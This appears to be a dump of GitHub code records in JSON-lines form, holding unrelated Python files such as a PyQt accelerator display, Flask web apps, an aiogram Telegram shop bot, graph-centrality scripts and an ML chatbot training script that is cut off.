graph_plot.setLabel(\n 'left',\n text=graph_data.get(\"labelY\"),\n units=graph_data.get(\"unitY\"))\n graph_plot.setLabel(\n 'bottom',\n text=graph_data.get(\"labelX\"),\n units=graph_data.get(\"unitX\"))\n\n for channel in graph_data.get(\"channels\"):\n\n channel_data = graph_data.get(\"channels\").get(channel)\n graph_plot.addChannel(\n y_channel=self.prefix + self.device_name + ':' + channel_data.get('path'),\n name=channel_data.get('name'),\n color=channel_data.get('color'),\n lineWidth=1)\n\n graph_plot.setMinimumWidth(600)\n graph_plot.setMinimumHeight(250)\n\n return graph_plot\n\n def display_graph(self):\n '''Display the graph tabs and all their contents'''\n gp_vlay = QVBoxLayout()\n tab = QTabWidget()\n tab.setObjectName(\"LITab\")\n\n for graph_name in self.graph_all_data:\n tablay = QVBoxLayout()\n tab_content = QWidget()\n\n graph_item = self.graph_all_data.get(graph_name)\n\n if len(graph_item.items()) != 2:\n tablay.addWidget(self.createGraph(graph_item), 10)\n tab_content.setLayout(tablay)\n else:\n for data in graph_item:\n tablay.addWidget(\n self.createGraph(graph_item.get(data)), 10)\n\n tab_content.setLayout(tablay)\n tab.addTab(tab_content, graph_name)\n\n gp_vlay.addWidget(tab)\n\n return gp_vlay\n\n def dataItem(self, channel, style):\n '''Get data channel info'''\n if style == 0:\n channel_info = SiriusLabel(\n parent=self,\n init_channel=self.prefix + self.device_name + ':' + channel)\n elif style in [1, 2, 4]:\n channel_info = SiriusSpinbox(\n parent=self,\n init_channel=self.prefix + self.device_name + ':' + channel)\n else:\n channel_info = QLabel(\"Error\", self)\n\n return channel_info\n\n def display_data(self, title, info, pos_x, pos_y, style):\n '''Build a data widget'''\n glay = QGridLayout()\n group = QGroupBox()\n\n countx = 0\n county = 0\n\n if style == 0:\n for text, channel in info.items():\n\n text_lb = QLabel(text, self)\n glay.addWidget(text_lb, countx, county)\n\n channel_lb = self.dataItem(channel, pos_y)\n channel_lb.showUnits = True\n glay.addWidget(channel_lb, countx, county+1)\n\n countx += 1\n else:\n channel_lb = self.dataItem(info, pos_y)\n channel_lb.showUnits = True\n glay.addWidget(channel_lb, pos_x, pos_y)\n\n glay.setAlignment(Qt.AlignCenter)\n\n group.setTitle(title)\n group.setLayout(glay)\n\n return group\n\n def display_mainData(self):\n '''Display all main data widgets'''\n countx = 0\n county = 0\n\n md_glay = QGridLayout()\n\n for title, info in self.bpm_main_data.items():\n\n if title in [\"Trigger Cnt\", \"Cycle\"]:\n md_glay.addWidget(\n self.display_data(\n title, info,\n countx, county, 1),\n countx, county,\n 1, 1)\n countx += 1\n else:\n md_glay.addWidget(\n self.display_data(\n title, info,\n countx, county, 0),\n countx, county,\n 2, 1)\n countx += 2\n\n if countx > 7:\n countx = 0\n county += 2\n\n md_glay.setAlignment(Qt.AlignCenter)\n\n return md_glay\n\n def display_secData(self):\n '''Build the secondary data widget'''\n\n group = QGroupBox()\n sc_glay = QGridLayout()\n\n countx = 0\n for text, channel in self.bpm_sec_data.items():\n\n if text != \"Orientation\":\n\n text_lb = QLabel(text, self)\n sc_glay.addWidget(text_lb, countx, 0, 1, 1)\n\n channel_lb = self.dataItem(channel, 1)\n channel_lb.showUnits = True\n sc_glay.addWidget(channel_lb, countx, 1, 1, 1)\n else:\n text_lb = QLabel(text, self)\n text_lb.setAlignment(Qt.AlignCenter)\n sc_glay.addWidget(text_lb, countx, 0, 1, 2)\n selection = PyDMEnumComboBox(\n init_channel=self.prefix + self.device_name+\":\"+channel)\n sc_glay.addWidget(selection, 
countx+1, 0, 1, 2)\n countx += 1\n\n sc_glay.setAlignment(Qt.AlignTop)\n group.setLayout(sc_glay)\n\n return group\n\n def selectionItem(self, title, channel, orientation):\n '''Build a selection widget'''\n group = QGroupBox()\n lay = QVBoxLayout()\n\n selector = enum_button.PyDMEnumButton(\n init_channel=self.prefix + self.device_name+\":\"+channel)\n selector.widgetType = 0\n selector.orientation = orientation\n lay.addWidget(selector, 0)\n\n group.setLayout(lay)\n group.setTitle(title)\n\n return group\n\n def display_selectors(self):\n '''Display the selector and the secondary data'''\n sl_vlay = QVBoxLayout()\n for title, channel in self.selectors_data.items():\n sl_vlay.addWidget(\n self.selectionItem(title, channel, 2), 1)\n\n sl_vlay.addWidget(self.display_secData(), 0)\n\n return sl_vlay\n","repo_name":"lnls-sirius/hla","sub_path":"pyqt-apps/siriushla/li_di_bpms/bpm_main.py","file_name":"bpm_main.py","file_ext":"py","file_size_in_byte":15421,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"38487399664","text":"import sys\nsys.path.append('..')\nimport torch\nimport pytorch_lightning as pl\nfrom datetime import datetime\n\nfrom dataset.ba_dataset import GISAXSDataModule\nfrom models.pipeline import Pipeline\n\n\nmode = '1d2d' # both in-plane projections and 2D images\npath = '/bigdata/hplsim/aipp/Maksim/BA_simulation/complete/'\nbatch_size = 32\ntrain_frac = 0.8 # fraction of points to train on, remaining - to validate on\nn_layers = 12 # number of layers in material\n\n#! change n_dp tp 650000 when training the final model\nn_dp = 10000 # number of datapoints in the training dataset\n\nin_shape = (1024,512) # shape of images in raw data\nout_shape = (128,16) # shape of preprocessed images\nto_preload = False # preload data in RAM before training\n\n# augmentation variables\nto_augment = 0\nsigma = None\ndrop_y = None\nsp_prob = None\ndrop_prob = None\n\ntrain_file = f'/bigdata/hplsim/aipp/Maksim/BA_simulation/exp_data/data_{n_layers}_{n_dp}.pt'\ntest_file = f'/bigdata/hplsim/aipp/Maksim/BA_simulation/exp_data/data_{n_layers}_test.pt'\npreloaded_files = {'train': train_file, 'test_file': test_file}\n\nindices = range(0, n_dp)\ndata_module = GISAXSDataModule(mode, batch_size, preloaded_files=preloaded_files, path=path, \n indices=indices, to_preload=to_preload, to_augment=to_augment,\n in_shape=in_shape, out_shape=out_shape,\n sigma=sigma, drop_y=drop_y, sp_prob=sp_prob, \n mask=True, verbose=True, order=False)\n\nconfig = dict(\n context_dim=96,\n flow_hidden=64,\n hidden_dim_dec=4,\n hidden_dim_enc=16,\n latent_dim=4)\n\ncvae_params = dict(\n latent_dim=config['latent_dim'],\n context_dim=config['context_dim'], \n hidden_dim_enc=config['hidden_dim_enc'],\n hidden_dim_dec=config['hidden_dim_dec'],\n n_samples=1,\n drop_prob=0.1,\n)\n\npipe = Pipeline(n_layers=12, n_transforms=8, hidden_dim=config['flow_hidden'], \n cvae_params=cvae_params, lr=1e-3, step_lr=10)\n\nprogress_bar = pl.callbacks.TQDMProgressBar(refresh_rate=1000)\n\ntrainer = pl.Trainer(logger=None, max_epochs=30, \n callbacks=progress_bar, devices=\"auto\", accelerator=\"auto\", \n enable_progress_bar=True, enable_checkpointing=False, \n gradient_clip_val=1.5, accumulate_grad_batches=1)\n\ntrainer.fit(model=pipe, datamodule=data_module)\n\ndateTimeObj = datetime.now()\ntimestring = f'{dateTimeObj.date().month}{dateTimeObj.date().day}{dateTimeObj.time().hour}{dateTimeObj.time().minute}'\ntorch.save(pipe.state_dict(), 
f'../saved_models/pipe_{n_dp}_{timestring}.pt')","repo_name":"maxxxzdn/gisaxs-reconstruction","sub_path":"scripts/train_pipe.py","file_name":"train_pipe.py","file_ext":"py","file_size_in_byte":2615,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"1585398558","text":"# 토마토\nimport sys\nfrom collections import deque\ninput=sys.stdin.readline\n\ndx=[-1,1,0,0]\ndy=[0,0,-1,1]\n\ndef bfs():\n while len(q):\n x,y=q.popleft()\n\n for i in range(4):\n nx=x+dx[i]\n ny=y+dy[i]\n\n if nx<0 or ny<0 or nx>=n or ny>=m:\n continue\n if g[nx][ny]==-1:\n continue\n if g[nx][ny]==0:\n g[nx][ny]=g[x][y]+1\n q.append((nx,ny))\n\nm,n=map(int,input().split())\ng=[]\nfor i in range(n):\n g.append(list(map(int,input().split())))\nq=deque()\n\nfor i in range(n):\n for j in range(m):\n if g[i][j]==1:\n q.append((i,j))\nbfs()\n\nfor i in range(n):\n if 0 in g[i]:\n print(-1)\n exit()\n\nprint(max(map(max,g))-1)","repo_name":"Mindlestick/CodingTest","sub_path":"5.DFS&BFS/BOJ7576.py","file_name":"BOJ7576.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5645781404","text":"import requests,json\n\nfrom flask import Flask, jsonify, request, render_template\n\napp = Flask(\"Average temperature calculator\")\n\n@app.route(\"/temperature/<cityname>\")\ndef get_avg_temp(cityname):\n input_city = requests.get(\"https://geocode.xyz/\" + cityname + \"?json=1\")\n city_details = json.loads(input_city.text)\n city_location_details = city_details[\"alt\"][\"loc\"]\n for i in range(len(city_location_details)):\n city_specification = city_location_details[i]\n if cityname == city_specification[\"city\"]:\n latitude = str(city_specification[\"latt\"])\n longitude = str(city_specification[\"longt\"])\n input_city_coordinates = requests.get(\"https://api.open-meteo.com/v1/forecast?latitude=\" + latitude + \"&longitude=\" + longitude + \"&hourly=temperature_2m\")\n weather_details = json.loads(input_city_coordinates.text)\n list_of_temp = weather_details[\"hourly\"][\"temperature_2m\"]\n avg_temp = sum(list_of_temp) / len(list_of_temp)\n return jsonify(avg_temp)\n return \"Inappropriate city name.\"\n\n\n@app.route(\"/usage\")\ndef render_html():\n # Without the return, Flask raises an error because the view yields None.\n return render_template(\"temperature.html\", city =\"Budapest\", country = \"Hungary\", averagetemp = get_avg_temp(\"Budapest\") )\n\n\n\n\n# https://geocode.xyz/Hauptstr.,+57632+Berzhausen?json=1\n\n# https://api.open-meteo.com/v1/forecast?latitude=52.52&longitude=13.41&hourly=temperature_2m\n\n# latitude:\"47.47\"\n# longitude:\"19.04\"\n# input_city_coordinates = requests.get(\"https://api.open-meteo.com/v1/forecast?latitude=\"+ \"47.47\"+ \"&longitude=\" +\"19.04\" + \"&hourly=temperature_2m\")\n# weather_details = json.loads(input_city_coordinates.text)\n# # print(weather_details)\n# list_of_temp = weather_details[\"hourly\"][\"temperature_2m\"]\n# print(list_of_temp)\n# avg_temp = sum(list_of_temp)/len(list_of_temp)\n# print(avg_temp)","repo_name":"talathkhaleel1/learning","sub_path":"automation/exam/temperature.py","file_name":"temperature.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"6911157460","text":"__author__ = 'sleonard'\n#Write a script that creates a 15,000-meter buffer around features in the airports.shp feature class classified as an\n# airport ( based on the FEATURE field ) and a 7,500-meter buffer around 
features classified as a seaplane base\n\nimport arcpy\nfrom arcpy import env\nenv.workspace = \"F:/GIS/A_Masters_Program/Python/Data/Exercise07\"\n# define working file\nfecl = \"airports.shp\"\n# define variables for selecting out Airports and seaplane bases\nvar1 = \"\\\"FEATURE\\\" = 'Airport'\"\nvar2 = \"\\\"FEATURE\\\" = 'Seaplane Base'\"\n# the next two steps select out the variables and create new shapefiles.\narcpy.Select_analysis(fecl, \"Results/airport_15000M.shp\", var1)\narcpy.Select_analysis(fecl, \"Results/airport_7500M.shp\", var2 )\n# final steps take the just created files and builds buffers and outputs two new shapefiles.\narcpy.Buffer_analysis(\"Results/airport_15000M.shp\", \"Results/airports_buffer_15000M.shp\", \"15000 METERS\")\narcpy.Buffer_analysis(\"Results/airport_7500M.shp\", \"Results/airports_buffer_7500M.shp\", \"7500 METERS\")\n","repo_name":"Sleonard6179/Lab_4.1","sub_path":"Chpt_7_challenge1.py","file_name":"Chpt_7_challenge1.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"21006768289","text":"from flask import Flask, render_template, request, redirect, url_for\nimport os, numpy\nfrom werkzeug.utils import secure_filename\nfrom prediction import predict\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = './static/uploads'\napp.config['ALLOWED_EXTENSIONS'] = {'png', 'jpg', 'jpeg', 'gif'}\n\ndef allowed_file(filename):\n return '.' in filename and filename.rsplit('.', 1)[-1].lower() in app.config['ALLOWED_EXTENSIONS']\n\n@app.route('/')\ndef index():\n return render_template('upload.html')\n\n@app.route('/upload', methods=['POST'])\ndef upload():\n if 'image' not in request.files:\n return redirect(request.url)\n\n file = request.files['image']\n\n if file.filename == '':\n return redirect(request.url)\n\n if file and allowed_file(file.filename):\n # Save the uploaded image on the server\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n predict(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n\n # Redirect to the display page with the image path\n return redirect(url_for('display', filename=filename))\n\n return \"Invalid file type. 
Allowed types: png, jpg, jpeg, gif\"\n\n@app.route('/display/<filename>')\ndef display(filename):\n # Get the image path and pass it to the display template\n image_path = os.path.join('static/results',filename) \n return render_template('display.html', image_path=image_path)\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"RGIIST/raga","sub_path":"api/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37825073177","text":"from typing import List\n\nfrom ted_sws.core.model.manifestation import ValidationSummaryReport\nfrom ted_sws.core.model.notice import Notice\nfrom ted_sws.core.model.validation_report import ReportNotice\nfrom ted_sws.data_manager.adapters.notice_repository import NoticeRepository\nfrom ted_sws.notice_validator.adapters.validation_summary_runner import ValidationSummaryRunner\n\n\ndef generate_validation_summary_report_notices(notices: List[ReportNotice],\n with_html: bool = False,\n template_metadata: dict = None) -> ValidationSummaryReport:\n validation_summary_runner = ValidationSummaryRunner()\n report = validation_summary_runner.validation_summary_for_notices(notices)\n if with_html:\n report.object_data = ValidationSummaryRunner.html_report(report, metadata=template_metadata)\n return report\n\n\ndef validation_summary_report_notice(notice: Notice, with_html: bool = False):\n validation_summary_runner = ValidationSummaryRunner()\n report = validation_summary_runner.validation_summary_for_notice(notice)\n if with_html:\n report.object_data = ValidationSummaryRunner.html_report(report)\n notice.validation_summary = report\n\n\ndef validation_summary_report_notice_by_id(notice_id: str, notice_repository: NoticeRepository,\n with_html: bool = False):\n notice = notice_repository.get(reference=notice_id)\n if notice is None:\n raise ValueError(f'Notice, with {notice_id} id, was not found')\n\n validation_summary_report_notice(notice=notice, with_html=with_html)\n notice_repository.update(notice=notice)\n","repo_name":"OP-TED/ted-rdf-conversion-pipeline","sub_path":"ted_sws/notice_validator/services/validation_summary_runner.py","file_name":"validation_summary_runner.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"54"} +{"seq_id":"13759458992","text":"from graph_tool.all import *\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport math\nimport time\nimport sys\nimport pickle\n\nclass Dataset(object):\n def __init__(self, X, rep):\n self.X = X\n self.rep = rep\n\nwith open(\"centr/centr_\"+sys.argv[1], \"wb\") as f:\n\tt0 = time.time()\n\tg = load_graph(\"datasets/\" + str(sys.argv[1]) + \".graphml\")\n\tt1 = time.time()\n\tprint(\"graph loaded successfully in \" + str(t1-t0) + \" seconds\")\n\n\tt0 = time.time()\n\tpr = pagerank(g)\n\tt1 = time.time()\n\tprint(\"pagerank calculated in \" + str(t1-t0) + \" seconds\")\n\tpr = [p for p in pr.a]\n\n\tt0 = time.time()\n\tbv, be = betweenness(g)\n\tt1 = time.time()\n\tprint(\"betweenness calculated in \" + str(t1-t0) + \" seconds\")\n\tbv = [b for b in bv.a]\n\n\t\"\"\"t0 = time.time()\n\tcl = closeness(g)\n\tt1 = time.time()\n\tprint(\"closeness calculated in \" + str(t1-t0) + \" seconds\")\n\tcl = [c for c in cl.a]\"\"\"\n\n\tt0 = time.time()\n\tev = eigenvector(g)[1]\n\tt1 = time.time()\n\tprint(\"eigenvector centrality calculated in \" + str(t1-t0) + \" seconds\")\n\tev = 
[e for e in ev.a]\n\n\tt0 = time.time()\n\tkz = katz(g)\n\tt1 = time.time()\n\tprint(\"katz calculated in \" + str(t1-t0) + \" seconds\")\n\tkz = [k for k in kz.a]\n\n\tt0 = time.time()\n\tht = hits(g)\n\tt1 = time.time()\n\tprint(\"hits calculated in \" + str(t1-t0) + \" seconds\")\n\tauth = [h for h in ht[1].a]\n\thub = [h for h in ht[2].a]\n\n\tt0 = time.time()\n\tid = [v.in_degree() for v in g.vertices()]\n\tt1 = time.time()\n\tprint(\"in degree calculated in \" + str(t1-t0) + \" seconds\")\n\n\tt0 = time.time()\n\tod = [v.out_degree() for v in g.vertices()]\n\tt1 = time.time()\n\tprint(\"out degree calculated in \" + str(t1-t0) + \" seconds\")\n\n\trep = [rep for rep in g.vertex_properties[\"Reputation\"]]\n\trep = (rep - np.amin(rep))/(np.amax(rep) - np.amin(rep))\n\tX = [[1 for b in bv], pr, bv, ev, kz, auth, hub, id, od]\n\tdata = Dataset(X,rep)\n\tpickle.dump(data,f,0)\n","repo_name":"lukasjf/graphmining-project","sub_path":"centrality.py","file_name":"centrality.py","file_ext":"py","file_size_in_byte":1838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15318946210","text":"import asyncio\nimport logging\n\nfrom aiogram import Bot, Dispatcher, types\nfrom aiogram import F\nfrom aiogram.filters.command import Command\nfrom aiogram.utils.keyboard import InlineKeyboardBuilder\nfrom config_reader import config\n\n\nlogging.basicConfig(level=logging.INFO)\n\nbot = Bot(token=config.bot_token.get_secret_value())\ndp = Dispatcher()\n\n\n@dp.message(Command('start'))\nasync def cmd_start(message: types.Message):\n user = message.from_user\n kb = [\n [\n types.KeyboardButton(text='🛒Товары'),\n types.KeyboardButton(text='👤Профиль'),\n types.KeyboardButton(text='🤝О нас')\n ]\n ]\n keyboard = (types.ReplyKeyboardMarkup(\n keyboard=kb,\n resize_keyboard=True\n ))\n await message.answer(\n f'<b>Добро пожаловать, {user.first_name}!</b>\\n'\n 'В магазине вы можете найти...\\n\\n\\n'\n '<i>❗️Бот написан в качестве примера❗️</i>',\n reply_markup=keyboard,\n parse_mode='HTML'\n )\n\n\n@dp.message(F.text.lower() == '🛒товары')\nasync def product(message: types.Message):\n await message.reply('Доделать')\n\n@dp.message(F.text.lower() == '👤профиль')\nasync def account(message: types.Message):\n await message.reply(\n 'Здесь будет информация о пользователе\\n\\n'\n f'<i>Имя: </i>\\n'\n '...\\n'\n '...\\n',\n parse_mode='HTML'\n )\n\n@dp.message(F.text.lower() == '🤝о нас')\nasync def about(message: types.Message):\n await message.reply(\n '<b>Раздел о нас❗️</b>\\n\\n'\n '<i>здесь может быть ваша информация</i>\\n'\n '...\\n'\n '...',\n parse_mode='HTML'\n )\n\n\nadmin_users = [5946765150, 'admin_username']\n@dp.message(Command('admin_panel'))\nasync def admin(message: types.Message):\n user = message.from_user\n if message.from_user.id in admin_users:\n kb = [\n [ \n types.KeyboardButton(text='🛒Товары'),\n types.KeyboardButton(text='Добавить товар'),\n types.KeyboardButton(text='Рассылка'),\n types.KeyboardButton(text='Добавить промокод')\n ]\n ]\n keyboard = (types.ReplyKeyboardMarkup(\n keyboard=kb,\n resize_keyboard=True\n ))\n await message.reply(f'Привет, <b>{user.first_name}!</b>',reply_markup=keyboard, parse_mode='HTML')\n else:\n await message.reply('У вас нет доступа к этой команде.')\n\n\n@dp.message(F.text.lower() == 'добавить товар')\nasync def add_product(message: types.Message):\n if message.from_user.id in admin_users:\n await message.answer('Введите название товара:')\n else:\n await message.answer('У вас нет доступа к этой 
command.')\n\n\n\n\n\n\n@dp.message(F.text.lower() == 'broadcast')\nasync def mailing(message: types.Message):\n    if message.from_user.id in admin_users:\n        await message.answer('Enter the broadcast text:')\n    else:\n        await message.answer('You do not have access to this command.')\n\n\n@dp.message(F.text.lower() == 'add promo code')\nasync def promo(message: types.Message):\n    if message.from_user.id in admin_users:\n        await message.answer('Enter a unique promo code:')\n    else:\n        await message.answer('You do not have access to this command.')\n\n\n\n\nasync def main():\n    await dp.start_polling(bot)\n\n\nif __name__=='__main__':\n    asyncio.run(main())\n","repo_name":"lilrory/TGShopBot_example","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"13000779460","text":"import time\nfrom flask import Flask, render_template, request\nimport sqlite3\nimport os\nfrom flask_socketio import SocketIO, emit, send, join_room, leave_room\nfrom multiprocessing import Value\n\nconn = sqlite3.connect('database', check_same_thread=False)\nc = conn.cursor()\n# create a table called rooms if it doesn't exist with room_id and epoch_time\nc.execute('''CREATE TABLE IF NOT EXISTS rooms (room_id text, timestamp integer)''')\nconn.commit()\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = os.urandom(24)\nsocketio = SocketIO(app)\n\ncounter = Value('i', 0)\n\n\n@app.route('/')\ndef homepage(): # put application's code here\n    return render_template('index.html')\n\n\n@app.route('/create')\ndef create():\n    with counter.get_lock():\n        counter.value += 1\n        new_room_id = counter.value\n    #update database with new room id and timestamp\n    c.execute('''INSERT INTO rooms VALUES (?, ?)''', (new_room_id, time.time()))\n    print(new_room_id)\n    return render_template('createRoom.html', room_id=new_room_id)\n\n\n@app.route('/room')\ndef room():\n    room_id = request.args.get('room_id')\n    # check if the room exists in the database\n    c.execute('''SELECT * FROM rooms WHERE room_id=?''', (room_id,))\n    if c.fetchone() is None:\n        return render_template('joinRoom.html', invalid=True)\n\n    return render_template('enterRoom.html', room_id=room_id)\n\n\n@app.route('/join')\ndef join():\n    return render_template('joinRoom.html', invalid=False)\n\n\nif __name__ == '__main__':\n    socketio.run(app)\n","repo_name":"blucardin/BlakcjackOnline","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"21949360300","text":"'''\nsbclearn (c) University of Manchester 2017\n\nsbclearn is licensed under the MIT License.\n\nTo view a copy of this license, visit <http://opensource.org/licenses/MIT/>.\n\n@author: neilswainston\n'''\n# pylint: disable=no-member\nimport unittest\n\nfrom sklearn import datasets, metrics, model_selection\nfrom sklearn.datasets.samples_generator import make_blobs\n\nimport numpy as np\nfrom sbclearn.theanets.utils import Classifier, Regressor\n\n\nclass TestClassifier(unittest.TestCase):\n    '''Tests the Classifier class.'''\n\n    def test_classify(self):\n        '''Tests the classify method.'''\n        x_data, y_data = make_blobs(n_samples=1000, centers=5, n_features=3,\n                                    cluster_std=1.0, random_state=0)\n\n        y_data = y_data.astype(np.int32)\n\n        x_train, x_test, y_train, y_test = \\\n            model_selection.train_test_split(x_data, y_data, test_size=0.2)\n\n        classifier = Classifier(x_train, 
y_train)\n        classifier.train()\n        y_pred = classifier.predict(x_test)\n\n        self.assertTrue(metrics.accuracy_score(y_test, y_pred) > 0.9)\n\n\nclass TestRegressor(unittest.TestCase):\n    '''Tests the Regressor class.'''\n\n    def test_predict(self):\n        '''Tests the predict method.'''\n        dataset = datasets.load_diabetes()\n\n        x_train, x_test, y_train, y_test = \\\n            model_selection.train_test_split(dataset.data, dataset.target,\n                                             test_size=0.2)\n\n        regressor = Regressor(x_train, y_train)\n        regressor.train()\n        y_pred = regressor.predict(x_test)\n\n        self.assertTrue(metrics.r2_score(y_test, y_pred) > 0.3)\n","repo_name":"neilswainston/development-py","sub_path":"synbiochemdev/sbclearn/theanets/test/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"29097096551","text":"#!/usr/bin/env python3\n\nfrom __future__ import (absolute_import, division, print_function)\n\n__metaclass__ = type\n\nimport os\nimport jinja2\nimport sys\nimport yaml\n\n\nclass Render:\n\n    def __init__(self, template=None, variables=None, templates_dir=os.environ.get('TEMPLATES_DIR')):\n        self.template = template\n        self.variables = variables\n        self.env = jinja2.Environment(\n            loader=jinja2.FileSystemLoader(templates_dir),\n            extensions=['jinja2.ext.autoescape', 'jinja2.ext.do', 'jinja2.ext.loopcontrols', 'jinja2.ext.with_'],\n            autoescape=True,\n            trim_blocks=True)\n\n    def yaml_filter(self, value):\n        # PyYAML has no RoundTripDumper (that class is from ruamel.yaml); use the default dumper\n        return yaml.dump(value, default_flow_style=False, indent=4)\n\n    def env_override(self, value, key):\n        return os.getenv(key, value)\n\n    def rend_template(self, vars_dir=os.environ.get('VARS_DIR')):\n        with open(vars_dir + \"/\" + self.variables, closefd=True) as f:\n            data = yaml.safe_load(f)\n\n        self.env.filters['yaml'] = self.yaml_filter\n        self.env.globals[\"environ\"] = lambda key: os.environ.get(key)\n        self.env.globals[\"get_context\"] = lambda: data\n\n        try:\n            template = self.env.get_template(self.template).render(data)\n        except Exception as e:\n            raise e\n        sys.stdout.write(template)\n\n        return template\n\n    def get_jinja2env(self):\n        return self.env","repo_name":"robertmarinescu/estuary-testrunner","sub_path":"entities/render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"33929364195","text":"n = int(input())\nlongest_inter = set()\n\nfor _ in range(n):\n    first, second = input().split(\"-\")\n    start_first, end_first = first.split(\",\")\n    start_second, end_second = second.split(\",\")\n    first_iter = set(range(int(start_first), int(end_first) + 1))\n    second_iter = set(range(int(start_second), int(end_second) + 1))\n    if len(first_iter.intersection(second_iter)) > len(longest_inter):\n        longest_inter = first_iter.intersection(second_iter)\n\nprint(f\"Longest intersection is {list(sorted(longest_inter))} with length {len(longest_inter)}\")\n","repo_name":"KalinHar/Advanced-Python-SoftUni","sub_path":"tuples and sets/longest intersection.py","file_name":"longest intersection.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"36871941620","text":"import nltk\r\nfrom nltk.tokenize import word_tokenize\r\nSENT_DETECTOR = nltk.data.load('tokenizers/punkt/english.pickle')\r\nfrom nltk.stem import WordNetLemmatizer\r\nlemmatizer = WordNetLemmatizer()\r\nimport json\r\nimport 
pickle\r\nfrom matplotlib import pyplot\r\n\r\nimport numpy as np\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Activation, Dropout\r\nfrom keras.optimizers import SGD\r\nimport random\r\n\r\ndef train():\r\n elements=[]\r\n classes = []\r\n eleTagPair = []\r\n ignore_charecters = ['?', '!']\r\n data_file = open('tri_train.json').read()\r\n intents = json.loads(data_file)\r\n\r\n\r\n for intent in intents['intents']:\r\n for Ques in intent['patterns']:\r\n\r\n #tokenize each word\r\n w = nltk.word_tokenize(Ques)\r\n elements.extend(w)\r\n #add documents in the corpus\r\n eleTagPair.append((w, intent['tag']))\r\n\r\n # add to our classes list\r\n if intent['tag'] not in classes:\r\n classes.append(intent['tag'])\r\n\r\n# lemmaztize and lower each word and remove duplicates\r\n elements = [lemmatizer.lemmatize(w.lower()) for w in elements if w not in ignore_charecters]\r\n elements = sorted(list(set(elements)))\r\n# sort classes\r\n classes = sorted(list(set(classes)))\r\n# documents = combination between patterns and intents\r\n #print (len(eleTagPair), \"eleTagPair\")\r\n # classes = intents\r\n #print (len(classes), \"classes\", classes)\r\n# words = all words, vocabulary\r\n #print (len(elements), \"unique lemmatized elements\", elements)\r\n\r\n\r\n pickle.dump(elements,open('words.pkl','wb'))\r\n pickle.dump(classes,open('classes.pkl','wb'))\r\n\r\n# create our training data\r\n trainData = []\r\n# create an empty array for our output\r\n output_empty = [0] * len(classes)\r\n# training set, bag of words for each sentence\r\n for doc in eleTagPair:\r\n # initialize our bag of words\r\n bag = []\r\n # list of tokenized words for the pattern\r\n pattern_words = doc[0]\r\n # lemmatize each word - create base word, in attempt to represent related words\r\n pattern_words = [lemmatizer.lemmatize(word.lower()) for word in pattern_words]\r\n # create our bag of words array with 1, if word match found in current pattern\r\n for w in elements:\r\n bag.append(1) if w in pattern_words else bag.append(0)\r\n \r\n # output is a '0' for each tag and '1' for current tag (for each pattern)\r\n output_row = list(output_empty)\r\n output_row[classes.index(doc[1])] = 1\r\n \r\n trainData.append([bag, output_row])\r\n#print(training)\r\n# shuffle our features and turn into np.array\r\n random.shuffle(trainData)\r\n trainData = np.array(trainData)\r\n# create train and test lists. 
X - patterns, Y - intents\r\n train_x = list(trainData[:,0])\r\n#print(train_x)\r\n train_y = list(trainData[:,1])\r\n print(\"Training data created\")\r\n return train_x, train_y,elements\r\n\r\ndef test(train_word_len):\r\n elements=[]\r\n classes = []\r\n eleTagPair = []\r\n ignore_charecters = ['?', '!']\r\n data_file = open('tri_test.json').read()\r\n intents = json.loads(data_file)\r\n\r\n\r\n for intent in intents['intents']:\r\n for Ques in intent['patterns']:\r\n\r\n #tokenize each word\r\n w = nltk.word_tokenize(Ques)\r\n elements.extend(w)\r\n #add documents in the corpus\r\n eleTagPair.append((w, intent['tag']))\r\n\r\n # add to our classes list\r\n if intent['tag'] not in classes:\r\n classes.append(intent['tag'])\r\n\r\n# lemmaztize and lower each word and remove duplicates\r\n elements = [lemmatizer.lemmatize(w.lower()) for w in elements if w not in ignore_charecters]\r\n elements = sorted(list(set(elements)))\r\n diff = train_word_len - len(elements)\r\n #print(diff)\r\n pad(elements,'x',train_word_len)\r\n #print(len(words))\r\n# sort classes\r\n classes = sorted(list(set(classes)))\r\n# eleTagPair = combination between patterns and intents\r\n #print (len(documents), \"documents\")\r\n # classes = intents\r\n #print (len(classes), \"classes\", classes)\r\n# elements = all words, vocabulary\r\n #print (len(elements), \"unique lemmatized words\", elements)\r\n\r\n\r\n 